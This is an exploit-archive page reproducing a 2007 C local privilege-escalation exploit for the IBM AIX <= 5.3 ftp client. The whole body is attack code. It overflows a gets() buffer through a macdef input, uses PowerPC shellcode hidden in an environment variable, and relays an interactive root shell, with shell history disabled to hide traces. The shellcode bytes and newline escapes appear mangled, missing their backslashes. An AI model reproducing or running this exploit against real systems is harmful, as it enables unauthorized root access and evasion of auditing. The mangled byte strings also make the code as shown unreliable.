IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit
# Published : 2007-07-27
# Author : qaaz
# Previous Title : IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
# Next Title : Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)

/* 07/2007: public release
 * IBM AIX <= 5.3 sp6
 *
 * AIX ftp Local Root Exploit
 * By qaaz
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>

#define TARGET		"/usr/bin/ftp"
#define OVERLEN		300

#define MAX(x,y)	((x) > (y) ? (x) : (y))
#define ALIGN(x,y)	(((x) + (y) - 1) / (y) * (y))

unsigned char qaazcode[] =
"x60x60x60x60x60x60x60x60"
"x7cx63x1ax79x40x82xffxfd"
"x7exa8x02xa6x3axb5x01x01"
"x88x55xffx5bx3axd5xffx1b"
"x7exc8x03xa6x4cxc6x33x42"
"x44xffxffx02x38x75xffx5f"
"x38x63x01x01x88x95xffx5d"
"x38x63x01x02x38x63xfexff"
"x88xa3xfexffx7cx04x28x40"
"x40x82xffxf0x7cxa5x2ax78"
"x98xa3xfexffx88x55xffx5c"
"x38x75xffx5fx38x81xffxf8"
"x90x61xffxf8x90xa1xffxfc"
"x4bxffxffxbdxb8x05x7cxff";

void	shell(int p1[2], int p2[2])
{
	ssize_t	n;
	fd_set	rset;
	char	buf[4096];

	for (;;) {
		FD_ZERO(&rset);
		FD_SET(p1[0], &rset);
		FD_SET(p2[0], &rset);

		n = select(MAX(p1[0], p2[0]) + 1,
		           &rset, NULL, NULL, NULL);
		if (n < 0) {
			perror("[-] select");
			break;
		}

		if (FD_ISSET(p1[0], &rset)) {
			n = read(p1[0], buf, sizeof(buf));
			if (n <= 0) break;
			write(p1[1], buf, n);
		}
		if (FD_ISSET(p2[0], &rset)) {
			n = read(p2[0], buf, sizeof(buf));
			if (n <= 0) break;
			write(p2[1], buf, n);
		}
	}
}

/* just because you don't understand it doesn't mean it has to be wrong */
ulong	get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
	ulong	top, len, off;
	int	i;

	len = 0;
	for (i = 0; argv[i]; i++)
		len += strlen(argv[i]) + 1;
	for (i = 0; envp[i]; i++)
		len += strlen(envp[i]) + 1;
	top = (ulong) argv[0] + ALIGN(len, 8);

	len = off = 0;
	for (i = 0; args[i]; i++)
		len += strlen(args[i]) + 1;
	for (i = 0; envs[i]; i++) {
		if (!strncmp(envs[i], "EGG=", 4))
			off = len + 4;
		len += strlen(envs[i]) + 1;
	}
	while (off & 3)
		strcat(envs[0], "X"), off++, len++;

	return top - ALIGN(len, 4) + off;
}

int	main(int argc, char *argv[], char *envp[])
{
	char	pad[16] = "PAD=X", egg[512];
	char	*args[] = { TARGET, NULL };
	char	*envs[] = { pad, egg, NULL };
	int	pi[2], po[2], i;
	pid_t	child;	
	ulong	addr;

	sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());

	if (!envp[0]) {
		setuid(geteuid());
		putenv("HISTFILE=/dev/null");
		execl("/bin/bash", "bash", "-i", NULL);
		execl("/bin/sh", "sh", "-i", NULL);
		perror("[-] execl");
		exit(1);
	}

	printf("----------------------------n");
	printf(" AIX ftp Local Root Exploitn");
	printf(" By qaazn");
	printf("----------------------------n");

	if (pipe(pi) < 0 || pipe(po) < 0) {
		perror("[-] pipe");
		exit(1);
	}

	addr = get_addr(argv, envp, args, envs);

	if ((child = fork()) < 0) {
		perror("[-] fork");
		exit(1);
	}

	if (child == 0) {
		dup2(pi[0], 0);
		dup2(po[1], 1);
		dup2(po[1], 2);
		execve(TARGET, args, envs);
		perror("[-] execve");
		exit(1);
	}

	write(pi[1], "macdef foonn$nfoo ab", 20);
	for (i = 0; i < OVERLEN; i += sizeof(addr))
		write(pi[1], &addr, sizeof(addr));
	write(pi[1], "n", 1);

	fflush(stdout);
	fflush(stderr);

	close(pi[0]);
	close(po[1]);
	shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
	kill(child, SIGTERM);
	waitpid(child, NULL, 0);
	return 0;
}

// www.Syue.com [2007-07-27]